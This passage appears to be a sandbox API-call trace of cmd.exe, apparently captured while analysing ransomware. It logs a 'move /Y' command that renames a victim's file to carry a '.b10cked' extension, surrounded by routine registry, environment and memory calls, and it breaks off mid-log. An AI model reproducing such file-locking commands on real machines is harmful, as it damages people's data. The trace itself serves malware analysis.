region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29720 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29721 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29722 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29723 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29724 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29725 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29726 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29727 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29728 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29729 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000001b0000" filename = "" Region: id = 29730 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 29731 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29732 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 29733 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 29976 start_va = 0x2d0000 end_va = 0x38ffff entry_point = 0x2d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 665 os_tid = 0xd54 [0202.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc6c | out: lpSystemTimeAsFileTime=0x2cfc6c*(dwLowDateTime=0xad4a1880, dwHighDateTime=0x1d440a9)) [0202.137] GetCurrentProcessId () returned 0xd20 [0202.137] GetCurrentThreadId () returned 0xd54 [0202.137] GetTickCount () returned 0x390e9 [0202.137] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc64 | out: lpPerformanceCount=0x2cfc64*=25892641960) returned 1 [0202.138] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.138] __set_app_type (_Type=0x1) [0202.138] __p__fmode () returned 0x76b331f4 [0202.138] __p__commode () returned 0x76b331fc [0202.138] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.138] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.138] GetCurrentThreadId () returned 0xd54 [0202.138] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd54) 
returned 0x38 [0202.138] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.138] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.139] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfbfc | out: phkResult=0x2cfbfc*=0x0) returned 0x2 [0202.139] VirtualQuery (in: lpAddress=0x2cfc33, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.139] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfbcc, dwLength=0x1c | out: lpBuffer=0x2cfbcc*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.139] GetConsoleOutputCP () returned 0x1b5 [0202.139] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0202.139] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.140] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.140] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.140] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.140] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.140] GetEnvironmentStringsW () returned 0x3c0180* [0202.140] FreeEnvironmentStringsW (penv=0x3c0180) returned 1 [0202.140] GetEnvironmentStringsW () returned 0x3c0180* [0202.140] FreeEnvironmentStringsW (penv=0x3c0180) returned 1 [0202.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb6c | out: phkResult=0x2ceb6c*=0x40) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0xa8, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.140] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x0, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.140] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegCloseKey (hKey=0x40) returned 0x0 [0202.141] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ceb6c | out: phkResult=0x2ceb6c*=0x40) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x40, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x1, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ceb74, 
lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x0, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x4, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x4) returned 0x0 [0202.141] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ceb74, lpData=0x2ceb78, lpcbData=0x2ceb70*=0x1000 | out: lpType=0x2ceb74*=0x0, lpData=0x2ceb78*=0x9, lpcbData=0x2ceb70*=0x1000) returned 0x2 [0202.141] RegCloseKey (hKey=0x40) returned 0x0 [0202.141] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.141] srand (_Seed=0x5b8863a4) [0202.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" [0202.141] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" [0202.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.141] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.142] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.142] GetEnvironmentVariableW 
(in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.142] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.142] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.142] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.142] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.142] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.142] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.142] GetEnvironmentStringsW () returned 0x3c22d0* [0202.142] FreeEnvironmentStringsW (penv=0x3c22d0) returned 1 [0202.142] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.142] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.142] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.142] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.142] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.142] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.142] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.142] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.142] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf938 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.142] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf938, lpFilePart=0x2cf934 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf934*="Desktop") returned 0x18 [0202.142] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) returned 1 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) returned 1 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) returned 1 [0202.143] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.143] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.143] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.143] GetEnvironmentStringsW () returned 0x3c2af0* [0202.143] FreeEnvironmentStringsW (penv=0x3c2af0) returned 1 [0202.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.144] GetConsoleOutputCP () returned 0x1b5 [0202.144] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.144] GetUserDefaultLCID () returned 0x409 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: 
lpLCData=":") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="0") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="0") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="1") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.145] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.146] GetConsoleTitleW (in: lpConsoleTitle=0x3b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") 
returned 0x7694ac6c [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.146] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.147] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.147] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.147] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.147] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.147] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.147] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.149] GetConsoleTitleW (in: lpConsoleTitle=0x2cf770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.149] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.149] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.149] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.150] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.150] _wcsicmp (_String1="move", 
_String2="RD") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.150] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.150] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.151] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.152] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf52c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf524, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf524*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.152] 
_wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.152] _wcsnicmp (_String1="COPYCMD", 
_String2="SystemR", _MaxCount=0x7) returned -16 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.153] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.153] _wcsicmp (_String1="MSMSTO~1.HXN", _String2=".") returned 63 [0202.153] _wcsicmp (_String1="MSMSTO~1.HXN", _String2="..") returned 63 [0202.153] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsto~1.hxn")) returned 0x2022 [0202.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.153] SetErrorMode (uMode=0x0) returned 0x0 [0202.153] SetErrorMode (uMode=0x1) returned 0x0 [0202.153] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", nBufferLength=0x104, lpBuffer=0x2ceeb4, lpFilePart=0x2cee9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", lpFilePart=0x2cee9c*="MSMSTO~1.HXN") returned 0x27 [0202.153] SetErrorMode (uMode=0x0) returned 0x1 [0202.153] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.154] _wcsicmp (_String1="MSMSTO~1.HXN", _String2=".") returned 63 [0202.154] _wcsicmp (_String1="MSMSTO~1.HXN", _String2="..") returned 63 [0202.154] 